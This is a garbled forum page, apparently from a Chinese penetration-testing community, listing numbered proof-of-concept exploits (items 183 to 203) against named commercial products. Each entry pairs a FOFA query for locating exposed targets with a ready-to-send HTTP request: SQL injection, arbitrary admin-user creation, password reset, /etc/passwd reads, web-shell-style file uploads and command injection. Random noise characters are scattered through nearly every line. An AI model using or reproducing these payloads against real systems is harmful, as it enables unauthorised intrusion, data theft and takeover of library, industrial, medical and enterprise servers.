" X  O% z' X3 F+ X7 n# ~) `' }9 Y1 k2 ]( ?
username=test1234&pwd=test1234&savedays=1  H8 d/ B, e7 ^- x# U& y! F# O

/ _, y& d4 g/ l$ N& m
# B2 O, A, Z5 w9 M5 s183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
3 C1 H& N. O" d7 g: qFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
$ N% q# r: ~. i- y, m1 aGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1! h3 u- Q3 _) X+ Q* i: D3 s
Host: your-ip9 q" I5 G. F( Q" n
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
+ L  G) C" P& F7 iAccept-Charset: utf-8
  D6 p: E) v& c$ {Accept-Encoding: gzip, deflate
( t2 B" M3 D/ n8 I; T: H6 v; pConnection: close
# U/ ~' V3 z6 L, O2 z( e8 k/ H# @+ }5 E. _7 ~
" Y% i' l, U' ~* `$ r! t3 @: ^+ s
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
/ G! S  `$ y) A  T( J* Z; {FOFA:server="SunFull-Webs"
& D5 C, P; ]6 x2 S1 ePOST /soap/AddUser HTTP/1.10 R- o# G$ }& t: e
Host: your-ip
* |! u& h6 A- J/ vAccept-Encoding: gzip, deflate( G- W$ x+ t$ i% P7 R3 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0. X9 d8 y! B* s- m
Accept: application/xml, text/xml, */*; q=0.01- `9 S6 U) R' w% T8 {2 H1 J( l0 ]2 B
Content-Type: text/xml; charset=utf-89 w) U1 [; g  E5 {3 P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  I' W$ d* t3 O8 s* d/ k. tX-Requested-With: XMLHttpRequest4 I5 V" i. @8 c  O2 _& H
9 ?# [" s; z4 ^: \

1 ]3 K' B8 a* L, o$ linsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
3 Z/ P+ r9 R% S0 H5 \4 Q+ d' Q0 G
' g8 }, J9 ?" k5 n0 N8 ?( {: l/ S, |1 x  A
185. 瑞友天翼应用虚拟化系统SQL注入
  e& T2 \! G2 s* {) wversion < 7.0.5.1
0 {. m5 u1 H& L8 F# k0 |( @FOFA:app="REALOR-天翼应用虚拟化系统"
- o" n( z+ ?8 x8 l/ Z) c" `& A; _& pGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1% {) O+ _3 u% O% t2 D$ p
Host: host8 p4 D5 }8 ?! S* w
! u8 a7 H, [. b8 l) l

0 Y1 U2 p5 r6 S, W, E186. F-logic DataCube3 SQL注入
  ?( h6 K3 O7 v" f8 R& tCVE-2024-31750
. O* i6 q2 S- JF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统# s. L6 Q+ L( [  B2 F7 M( `6 a
FOFA:title=="DataCube3"
# J( ~, B' U) h% r, }POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
( u9 W) ?/ ?9 H8 XHost: your-ip
% W! r, |7 t0 L+ P0 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.05 C7 U5 v4 s1 A& s& N$ U2 |" w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8* L! `; `3 G4 [3 }9 u) u* H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 r, @* U4 a7 g) ZAccept-Encoding: gzip, deflate# f0 @3 |+ h. V4 ]+ U$ ]
Connection: close
8 M& Y# b+ ^2 pContent-Type: application/x-www-form-urlencoded% A9 ]2 N4 a: T4 O2 b
, W. y# J7 _2 L* W1 ?* Y. `  S
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
* O4 d3 u6 Q% f1 ]5 x6 O" u$ E2 X8 J; P
# s  D6 E9 x$ J7 N( Z2 ^+ g
187. Mura CMS processAsyncObject SQL注入
( O, Y- \% M* r+ v$ c6 ECVE-2024-32640
+ M- h- ^' s7 R) wFOFA:"Mura CMS"1 L7 M  u% @! g2 U
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1! A! P- o$ J: g4 w) q& p
Host: your-ip6 h6 y( Z- p; [0 z1 O2 L. F
Content-Type: application/x-www-form-urlencoded
3 t. O$ u) D3 g- L* \+ k
$ |$ G" O  g! D4 |
2 U7 d/ v: g+ S' V* d& tobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
: C; @& ?0 q2 G. O$ p0 J' [
5 f% G. U/ a( S, i
4 e- M% W0 z2 M; @7 V188. 叁体-佳会视频会议 attachment 任意文件读取" c3 F( |* j0 p) o/ T/ d0 c
version <= 3.9.7( x3 G- ?# m1 M- v$ S7 C( @9 ^
FOFA:body="/system/get_rtc_user_defined_info?site_id"
  m' [8 r% y1 ~" E4 aGET /attachment?file=/etc/passwd HTTP/1.1
+ Q: }$ W# E  b. HHost: your-ip2 O9 L& b% t8 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 X5 g7 a1 S3 e; R' c1 F0 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; U2 n$ |4 S; g) k, ]Accept-Encoding: gzip, deflate
/ a/ x2 a2 v$ U" U6 y; f( w2 p( _Accept-Language: zh-CN,zh;q=0.9,en;q=0.8& s: g+ S8 U# U/ I9 r; _& G
Connection: close
) U- T9 ~- [5 X5 L! H  v4 |8 [5 K
7 p0 ?- Z. b. m$ n8 W0 {% I2 \, l/ N+ K. R, s
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
7 O5 j7 j7 W% f" h# t* \FOFA:app="LANWON-临床浏览系统"
7 V3 F% z2 G% g* cGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.10 c& S- C4 a- f, s/ D2 y2 p
Host: your-ip  f. y3 j" f# [  D
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36$ O; N5 m3 D" t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' G% C* p& z9 E4 WAccept-Encoding: gzip, deflate/ u2 S* z" b# h+ `" m+ M$ [4 C
Accept-Language: zh-CN,zh;q=0.9
6 ]( P: y; d# g, L2 P2 WConnection: close
' y; b( g7 b# O: v/ t6 o4 h9 z' y( w4 ~
! M( G- B# M* t+ p  }% U' y5 A& b
190. 短视频矩阵营销系统 poihuoqu 任意文件读取8 I- ~5 ~9 Y" v4 i! v
FOFA:title=="短视频矩阵营销系统"8 S7 Q( h- E% o3 l. ^" N1 \* N% @
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
3 m) O' D; T& aHost: your-ip
+ ~, M" r! {$ y5 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36$ @1 p4 g& ?6 [0 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9; B: [3 s, {4 B* y
Content-Type: application/x-www-form-urlencoded
% [6 ^% d8 A% {* eAccept-Encoding: gzip, deflate
8 ~& P9 D4 e6 J, n6 D* cAccept-Language: zh-CN,zh;q=0.9
8 F7 j: y3 _! i; g0 L7 O3 u& J) t) r7 M; a! b
poi=file:///etc/passwd
5 J# w+ K5 P8 w% O# X
3 L/ J3 Q5 }$ O$ m0 P* g- u7 V: w" e3 V/ W. S: h  m& T
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入6 g% o  X* ?6 g+ m
FOFA:body="/CDGServer3/index.jsp"
( w$ e+ D5 L' ^/ r1 BPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
2 P$ u+ N+ k- m* X; \) [Host: your-ip
( ~7 K. G! p: B9 R8 n1 _7 n9 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 _: z7 {3 h" g- jContent-Type: application/x-www-form-urlencoded" a7 k2 g4 F" e
$ F  t) f$ d9 |! c
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
: T9 U. C( q  t1 u7 _3 ~/ v9 u4 g+ z! g6 k* B
5 U) c& e5 W1 F/ f: n
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传4 b* B# D: w7 Q) M7 f0 O
FOFA:title="用户登录_富通天下外贸ERP"' K" k/ W+ M( u, I* Y
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1+ H) k  b$ ?% h0 l7 O* X* G
Host: your-ip
8 t  i7 `5 P( Y8 _& BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36% w/ b+ h1 g2 \' `
Content-Type: application/x-www-form-urlencoded
" }$ b& E: ]: K. `3 m9 M7 O+ _3 a4 \/ {: K. P
; o3 G1 O4 v8 I
<% @ webhandler language="C#" class="AverageHandler" %>8 C8 a. }& t. ~/ ]  c
using System;
+ L. E- E* P! s  O% |6 |6 p, ?) C- eusing System.Web;
( z/ p$ Z/ K8 epublic class AverageHandler : IHttpHandler, K$ _4 Y# ?* ~  `# F' M$ h
{4 H4 l; z, N( z/ ~6 L* E. Y. n
public bool IsReusable
+ [' z+ f6 F9 {3 I7 L{ get { return true; } }
. Z* Y8 s( Z" V# t% s. ipublic void ProcessRequest(HttpContext ctx)* ~+ `9 {: t1 L& R4 R
{
3 V. y$ e% h; @  [" [6 j( `1 gctx.Response.Write("test");
, G: g' @' a" D}/ x& a! q0 t' J$ u+ f- l
}* F- c/ G! ]" z* Y0 @

9 x) w5 n# s2 [3 u, P% D4 o& T1 j" @; L- [& e1 d
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
; _0 F6 k6 d' |. c+ [3 gFOFA:body="山石云鉴主机安全管理系统"" A1 P+ l; f: b8 H/ J- c
GET /master/ajaxActions/getTokenAction.php HTTP/1.1$ ]4 j% k# J6 ~1 w' p% O. `
Host:, C, Z/ k; X, _8 r2 }) }
Cookie: PHPSESSID=2333333333333;
4 J& |. @) ^* x6 i! C- yContent-Type: application/x-www-form-urlencoded
3 u5 r7 X" J: t  A  _8 X* iUser-Agent: Mozilla/5.0) j5 i3 h% [- u! j/ V1 F" r! B" D
5 G3 ^" r" r: [$ t$ p

1 t. g. c6 ~( WPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
# o# a, K/ C6 h  H; SHost:
; f6 K, W- X( n) |- f. RUser-Agent: Mozilla/5.06 M2 G. h' z$ X1 n: v0 v
Accept-Encoding: gzip, deflate8 y; N& g3 ^) Q$ V' D; c
Accept: */*% k* r! ~- r/ }& o0 S+ H
Connection: close
0 c/ c/ R. v" CCookie: PHPSESSID=2333333333333;) u# G1 x8 X4 K. T* A$ Y7 a- c9 }
Content-Type: application/x-www-form-urlencoded3 b6 o8 [+ N) Q- ?  F$ y
Content-Length: 84, K7 b) A7 h5 V- B( D+ R

3 K; b7 x! L- U- v9 U  T/ Vparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')8 ?2 E! F4 ~4 h) J) G$ I

9 O. a, _; s# u. w. i
3 r! v7 ]0 p7 Q) y# ~6 KGET /master/img/config HTTP/1.1; R6 e* A; _; M/ ^8 ]+ T9 y
Host:: K7 |0 [  @1 E8 i7 X8 ~9 F- p
User-Agent: Mozilla/5.0) X' b$ p, J0 q7 K

1 {; p* i  i: H0 `) R- b# i- _- ~6 m# _% q* m5 c  C
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传4 X( q( I) |. |' L
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在! W) g) J1 S4 H

- O+ k0 m$ x5 T: L& N; xPOST /servlet/uploadAttachmentServlet HTTP/1.12 @' d$ l) ^" Y0 Y4 I
Host: host; O* w2 E$ ~4 ]9 D: P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.364 i/ V# ?0 D; j" m; ?; f: A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% K2 t; \3 m' ]5 `& w9 _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 N2 F1 S% f/ r/ y- B1 C+ s1 g0 u
Accept-Encoding: gzip, deflate
- ^1 k5 T, S: a( ~' ZConnection: close; i' {5 k; [, G$ M" f( [
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk! v$ U4 s2 U3 E8 J
------WebKitFormBoundaryKNt0t4vBe8cX9rZk  l& V- \) c- C) s

' f" d! U1 J! |+ z$ BContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"9 `: u2 h( F7 Q2 e  w1 V8 a0 `8 G
Content-Type: text/plain
( I; H: `) R. a0 Z5 w& F<% out.println("hello");%>  Q6 |9 R8 K4 {1 t7 S4 H
------WebKitFormBoundaryKNt0t4vBe8cX9rZk3 F. Z7 r  d2 I4 q, T4 ~
Content-Disposition: form-data; name="json"
9 n) D3 O7 j: V5 E# i/ y0 ] {"iq":{"query":{"UpdateType":"mail"}}}- o' F8 O9 {: [. |! ~9 z  Y
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--3 o) r  ~* d/ W; d; O

/ k. J) U7 z* v" Q' N
1 C) q+ M% p! u1 l+ G* T195. 飞鱼星上网行为管理系统 send_order.cgi命令执行" d* m! Z+ R/ S' R
FOFA:title=="飞鱼星企业级智能上网行为管理系统
2 e* C$ e( I  D" [, q* t- ^( m( {; |POST /send_order.cgi?parameter=operation HTTP/1.1+ c) U8 g5 E0 j
Host: 127.0.0.1# e6 J" f/ x7 S. G$ n0 h
Pragma: no-cache
, `- d5 b& Y9 X; JCache-Control: no-cache% l' b" y5 J+ I" x6 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.367 `; B& y! o! B8 I8 {/ |
Accept: */*9 `; F7 ~% U8 _7 g+ t1 r& M6 p" v
Accept-Encoding: gzip, deflate5 A8 Y4 h' @0 [% H
Accept-Language: zh-CN,zh;q=0.97 |  u2 K  R$ h- d5 T  v, l9 n
Connection: close0 e7 p. X) c* Y# x* J
Content-Type: application/x-www-form-urlencoded
/ D* \+ ~9 M- v" T; H5 IContent-Length: 68
' q2 o9 b  c) n% d- v0 {4 C( Z% d0 j" _2 X) ^# W
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}% x) X  A6 `4 u+ u9 I

' D% C# B, x% x" K  j, Y6 i* ^* m$ f1 |
196. 河南省风速科技统一认证平台密码重置6 u1 U( e8 B% ?- e) [0 A3 ?
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"* O; ^# F$ t+ Z/ G9 H
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
* t# E* Z& }1 i) u; TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
# p6 h: o; j5 D% E* @3 XContent-Type: application/json;charset=UTF-8
& {9 l& C! t8 AX-Requested-With: XMLHttpRequest
( I- h- }- r3 e0 p1 b6 R& h1 _Host:
0 [- ~3 D; ?- z+ jAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
9 J& W6 d5 X5 tContent-Length: 45
( ?/ I- n1 G' h  oConnection: close
! @( k/ S+ y) C$ D  Z
# |' @" o# h# i0 |$ Y{"xgh":"test","newPass":"test666","email":""}
2 b3 V. Q+ x$ w/ |5 m  T/ C1 x. V1 G
: O* Q2 W0 }/ Z$ k0 e& P  ~
6 [1 u* [9 b* E6 }
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
" w/ x6 Y$ v) _3 q' FFOFA:app="浙大恩特客户资源管理系统"
- O3 X& o, R# W% U, qGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
5 [1 [' Z: W+ C+ w% B) GHost:$ T0 E9 l! r/ M( E* i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.364 H# q- p7 q! Z$ h: C* o, e
Accept-Encoding: gzip, deflate# y/ s0 O# f" h
Connection: close
7 |. Y5 Z2 ?" j$ u, }, y' {* A; K* L4 \2 G7 n* V  D

, }* `7 z5 V4 G' l* ~, @6 N* H5 Z/ {: i# x7 @
198.  阿里云盘 WebDAV 命令注入2 b2 e6 P( G) Q
CVE-2024-29640( N' d' _# v: J. B) i/ U' q
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
2 W: C* a4 L4 x1 ~, a4 `$ b- o- gCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
0 Q0 D+ X* h; C" n3 xAccept: */*3 d" C4 G. s6 l0 {) Z
Accept-Encoding: gzip, deflate
* k' ]3 T2 Y( M+ b8 I- L$ fAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6# y1 q! l2 k1 L
Connection: close
  s) B/ _' |: o! {6 E! [$ {* {" v: n: ~* R5 n7 L2 n- m
3 i5 B: I9 ^& K! B
199. cockpit系统assetsmanager_upload接口 文件上传5 _8 o5 m, Y* m1 Z+ F! N
* [5 g: a& q. ^3 b
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
% p2 l6 k% w# _0 x; pGET /auth/login?to=/ HTTP/1.10 |4 v4 d% Z+ P( a8 J0 E

  n6 N4 O: q% D- c- c0 `3 s6 Q6 X响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"( w3 Z! c4 i/ d( _/ \
" J3 @6 D7 Z+ b$ O# h1 w% y
2.使用刚才上一步获取到的jwt获取cookie:! }; |2 _4 F( S* t

! m3 t2 D0 K% y7 O- w  j9 H3 IPOST /auth/check HTTP/1.1' j1 h# h7 S$ e& _3 W' M2 ^- |
Content-Type: application/json
, w( _- U. r  E. f! U) g0 e3 _
4 k8 i4 z  I1 l& H6 b0 ?{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}5 b8 h, J0 M# M

  S+ n0 m! T0 M: o: m! x% w& S! i响应:200,返回值:- X' s- d- G& Z; G5 `
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
& T& |2 l8 }+ v( ]6 iFofa:title="Authenticate Please!"
. u2 j2 z5 O, e; W. h  T/ vPOST /assetsmanager/upload HTTP/1.1) v0 d0 ~$ E6 A8 o
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
% X5 @+ E6 R5 n" V& yCookie: mysession=95524f01e238bf51bb60d77ede3bea92/ Q# ?) J8 m" h

1 ]/ c* M, c4 q-----------------------------36D28FBc36bd6feE7Fb3
" U6 q- e4 ]' Y& o) {Content-Disposition: form-data; name="files[]"; filename="tttt.php"* A& d& o; X4 `' c2 l
Content-Type: text/php
1 ]7 ?. o/ i$ b' `, x9 R2 x9 R# M* U+ Y8 }  _6 Q
<?php echo "tttt";unlink(__FILE__);?>7 q: F6 p: g4 ~. S8 Y
-----------------------------36D28FBc36bd6feE7Fb3
, \) J4 e2 ^8 U$ e! Q4 J, v" hContent-Disposition: form-data; name="folder"
. M$ r8 i: [9 I6 q/ l* v  M
5 D9 F- M  H( M4 Z7 P-----------------------------36D28FBc36bd6feE7Fb3--
$ }2 _$ m, u3 {, n- l
/ J9 p' x4 e2 _
# ~  L! y4 g  P% t( a: W/storage/uploads/tttt.php
" y& h# T, k- N, L6 z
$ t2 L: j' ?/ A. T/ c$ T5 ?; F200. SeaCMS海洋影视管理系统dmku SQL注入( u3 ~8 O- @9 z' D( N! L
FOFA:app="海洋CMS"5 n3 G; |& }5 y2 P9 ^7 U5 P  W9 E
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
; M# \7 U2 M  k, VCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s% ]. ]5 Q0 v. w  m* i' I
Upgrade-Insecure-Requests: 1
7 Z) S( j  u* T. K' YCache-Control: max-age=0" a2 L5 _3 R9 G. J) J$ E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 v, f# V$ ]7 Q0 F# P# g$ O# ^4 d7 I
Accept-Encoding: gzip, deflate+ A6 s5 X" O# d- a$ n
Accept-Language: zh-CN,zh;q=0.9
3 u  X; G4 A7 {& i; l# h0 R7 [0 J0 v

8 E+ A5 V, O# B  z201. 方正全媒体新闻采编系统 binary SQL注入
4 F- t+ p+ i. n# ?  k( AFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"; k7 f: z+ F% i/ e( E* d! ?0 Q
POST /newsedit/newsplan/task/binary.do HTTP/1.19 u7 i  S7 u( w/ v' ^) |
Content-Type: application/x-www-form-urlencoded
* h6 n" R- r' b3 P; U& C  h# |# IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 q6 `$ M4 g+ y- V: oAccept-Encoding: gzip, deflate: Y; B1 [1 ?/ a9 ~* R. i
Accept-Language: zh-CN,zh;q=0.9
% u! z; S- _% y" G4 F/ v# fConnection: close
! f+ v% q  a6 k" g2 @, Y* \, q
2 I# r, Y: c3 `9 [2 q7 ?TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1& b: J) k. f7 q! Q7 q

2 `" b  C$ }0 C9 Y, n1 o4 z" B
; ~# _: X8 q3 [; g" _- S202. 微擎系统 AccountEdit任意文件上传
  a3 ~" C& [" F$ ~) @FOFA:body="/Widgets/WidgetCollection/"  n0 A; }' V6 w! ~* k. T
获取__VIEWSTATE和__EVENTVALIDATION值1 h$ D$ O# U0 _. T8 H8 B
GET /User/AccountEdit.aspx HTTP/1.1: T3 P7 H7 {$ r( m( S! r2 q) K' ^
Host: 滑板人之家
$ A( C0 S1 M$ {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31* q$ L* z& E7 |: |
Content-Length: 0/ ?0 M2 \* `% l% ?  T8 B* `

  F9 v# f9 u! |+ C0 m1 d2 b1 B
$ R8 V& [- x( H/ r9 E9 q替换__VIEWSTATE和__EVENTVALIDATION值
6 ]) s+ \* C% R' @# \# I7 p9 n! nPOST /User/AccountEdit.aspx HTTP/1.1
) n& L: M4 O- t5 FAccept-Encoding: gzip, deflate, br. p0 V9 ?0 O, O/ m% F
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
# Q- s; i+ m7 q) O9 [4 A4 I$ Q- T
: G3 O! U0 u! I4 N; B2 G0 x& n-----------------------------786435874t38587593865736587346567358735687" z0 h  _3 a* q2 }; o3 [/ [+ _
Content-Disposition: form-data; name="__VIEWSTATE"  V$ d7 {  X6 M, D' G
5 S1 D+ L5 s% s: a9 R0 Q
__VIEWSTATE4 r3 x2 r0 P" t+ k0 A
-----------------------------786435874t385875938657365873465673587356870 J6 q+ |- }) i) H" {
Content-Disposition: form-data; name="__EVENTVALIDATION"
  K! _# {% Z- s$ O5 }4 Z% }2 G& \1 M( I$ q/ S* y4 |
__EVENTVALIDATION
; H1 `6 ]: G6 m-----------------------------786435874t38587593865736587346567358735687
: y& C  D; G) N+ U$ A* [Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
/ M3 j4 F2 |' l% Y$ B5 o; k: zContent-Type: text/plain
' N: H2 i% M4 e( C$ i' }+ K  \: ^
Hello World!
" s4 N- u, Y( r* I* x-----------------------------786435874t38587593865736587346567358735687
9 F8 _+ y& f% m% l/ g' f3 Z) o8 @* cContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"/ v& A9 W' W: U% S( }8 e

( ?" H& m) T4 ~% W上传图片' F' x8 A9 t& \% h/ m
-----------------------------786435874t38587593865736587346567358735687
) {, C, e* l  d1 Y1 DContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
( s$ n8 Z8 o1 B: S! x+ E, S" X9 _: _8 M" d# m

% X) l' T! R9 r! n: q-----------------------------786435874t38587593865736587346567358735687# g+ x! n- K- P8 m; i; D
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
4 ]/ h) _- f* s# I' Y8 ~  u8 I, D
+ N; g; x, L# M% f/ [6 Y$ [' M; P5 _
-----------------------------786435874t38587593865736587346567358735687--; ^" Q- e% T' w' c- x

1 E. e" A/ K" ~' `+ P. z
3 Q' H+ J3 B& M: p8 n/_data/Uploads/1123.txt
- X) C% P, I% O1 f( T) I
' Z, s/ o5 W) ?) C3 o9 f203. 红海云EHR PtFjk 文件上传
/ J& V- U8 f4 lFOFA:body="RedseaPlatform": q) y  O4 `0 q$ C1 O8 p
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.17 S; P# N6 U, b9 n, k. V) o* |1 z
Host: x.x.x.x" r: R) d, P! e- G% X) W
Accept-Encoding: gzip" `. u5 `4 e5 l8 Y  w' ^* C/ H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ w/ k$ v6 a" e; g8 e, v5 v1 uContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4" t/ Q3 y- I8 x+ \
Content-Length: 210
% f8 ]5 o6 ?/ ]1 ^! G6 J) u! i, q. m$ O/ A
------WebKitFormBoundaryt7WbDl1tXogoZys4
4 G9 t4 e/ U" O$ tContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
% f7 E/ P4 b5 h1 S% i' WContent-Type:image/jpeg
3 h* K# ]' F! e1 r* \" ]; d0 I2 S. V8 Y% E6 ~
<% out.print("hello,eHR");%>
# l! U4 B! i) I+ }5 L5 M' ~------WebKitFormBoundaryt7WbDl1tXogoZys4--2 A+ _3 V! A2 `# I" z( t7 b

& |- v) Y  |4 \3 @& Z ! U3 {: |2 i( E4 n3 A

# u1 b* Q) `) `2 ], @9 t! t- T
2 B! \6 h! {! F' R
- }5 B+ [. |# F# s; q7 a3 @
# \1 ?2 k9 ]7 ]3 G





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2